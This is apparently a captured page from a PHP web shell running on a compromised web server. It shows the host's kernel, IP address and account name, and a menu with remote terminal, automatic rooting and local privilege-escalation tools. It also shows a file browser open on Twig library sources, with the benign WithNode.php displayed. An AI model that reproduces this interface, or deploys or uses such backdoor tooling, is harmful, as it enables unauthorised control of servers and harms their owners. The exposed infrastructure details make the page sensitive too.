Linux srv25.usacloudserver.us 5.14.0-570.39.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Sep 4 05:08:52 EDT 2025 x86_64
LiteSpeed
Server IP : 23.137.84.82 & Your IP : 216.73.216.127
Domains :
Cant Read [ /etc/named.conf ]
User : epicgamerzoneco
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
cpguard /
app /
vendor /
twig /
twig /
src /
Node /
Delete
Unzip
Name
Size
Permission
Date
Action
Expression
[ DIR ]
drwxr-xr-x
2025-05-08 04:26
AutoEscapeNode.php
866
B
-rw-r--r--
2024-09-27 07:26
BlockNode.php
1.21
KB
-rw-r--r--
2024-09-27 07:26
BlockReferenceNode.php
870
B
-rw-r--r--
2024-09-27 07:26
BodyNode.php
389
B
-rw-r--r--
2024-09-27 07:26
CaptureNode.php
1.48
KB
-rw-r--r--
2024-09-27 07:26
CheckSecurityCallNode.php
653
B
-rw-r--r--
2025-05-08 04:26
CheckSecurityNode.php
2.97
KB
-rw-r--r--
2024-09-27 07:26
CheckToStringNode.php
1.25
KB
-rw-r--r--
2024-09-27 07:26
DeprecatedNode.php
1.83
KB
-rw-r--r--
2024-09-27 07:26
DoNode.php
820
B
-rw-r--r--
2024-09-27 07:26
EmbedNode.php
1.54
KB
-rw-r--r--
2025-05-08 04:26
EmptyNode.php
648
B
-rw-r--r--
2025-05-08 04:26
FlushNode.php
772
B
-rw-r--r--
2024-09-27 07:26
ForElseNode.php
864
B
-rw-r--r--
2025-05-08 04:26
ForLoopNode.php
1.42
KB
-rw-r--r--
2024-09-27 07:26
ForNode.php
4.37
KB
-rw-r--r--
2025-05-08 04:26
IfNode.php
2.24
KB
-rw-r--r--
2025-05-08 04:26
ImportNode.php
1.86
KB
-rw-r--r--
2025-05-08 04:26
IncludeNode.php
3.2
KB
-rw-r--r--
2025-05-08 04:26
MacroNode.php
3.94
KB
-rw-r--r--
2025-05-08 04:26
ModuleNode.php
15.57
KB
-rw-r--r--
2025-05-08 04:26
NameDeprecation.php
916
B
-rw-r--r--
2024-09-27 07:26
Node.php
9.17
KB
-rw-r--r--
2025-05-08 04:26
NodeCaptureInterface.php
384
B
-rw-r--r--
2024-09-27 07:26
NodeOutputInterface.php
363
B
-rw-r--r--
2024-09-27 07:26
Nodes.php
526
B
-rw-r--r--
2025-05-08 04:26
PrintNode.php
1008
B
-rw-r--r--
2024-09-27 07:26
SandboxNode.php
1.28
KB
-rw-r--r--
2024-09-27 07:26
SetNode.php
3.91
KB
-rw-r--r--
2025-05-08 04:26
TextNode.php
834
B
-rw-r--r--
2024-09-27 07:26
TypesNode.php
569
B
-rw-r--r--
2025-05-08 04:26
WithNode.php
2.07
KB
-rw-r--r--
2024-09-27 07:26
Save
Rename
<?php /* * This file is part of Twig. * * (c) Fabien Potencier * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Twig\Node; use Twig\Attribute\YieldReady; use Twig\Compiler; /** * Represents a nested "with" scope. * * @author Fabien Potencier <fabien@symfony.com> */ #[YieldReady] class WithNode extends Node { public function __construct(Node $body, ?Node $variables, bool $only, int $lineno) { $nodes = ['body' => $body]; if (null !== $variables) { $nodes['variables'] = $variables; } parent::__construct($nodes, ['only' => $only], $lineno); } public function compile(Compiler $compiler): void { $compiler->addDebugInfo($this); $parentContextName = $compiler->getVarName(); $compiler->write(\sprintf("\$%s = \$context;\n", $parentContextName)); if ($this->hasNode('variables')) { $node = $this->getNode('variables'); $varsName = $compiler->getVarName(); $compiler ->write(\sprintf('$%s = ', $varsName)) ->subcompile($node) ->raw(";\n") ->write(\sprintf("if (!is_iterable(\$%s)) {\n", $varsName)) ->indent() ->write("throw new RuntimeError('Variables passed to the \"with\" tag must be a mapping.', ") ->repr($node->getTemplateLine()) ->raw(", \$this->getSourceContext());\n") ->outdent() ->write("}\n") ->write(\sprintf("\$%s = CoreExtension::toArray(\$%s);\n", $varsName, $varsName)) ; if ($this->getAttribute('only')) { $compiler->write("\$context = [];\n"); } $compiler->write(\sprintf("\$context = \$%s + \$context + \$this->env->getGlobals();\n", $varsName)); } $compiler ->subcompile($this->getNode('body')) ->write(\sprintf("\$context = \$%s;\n", $parentContextName)) ; } }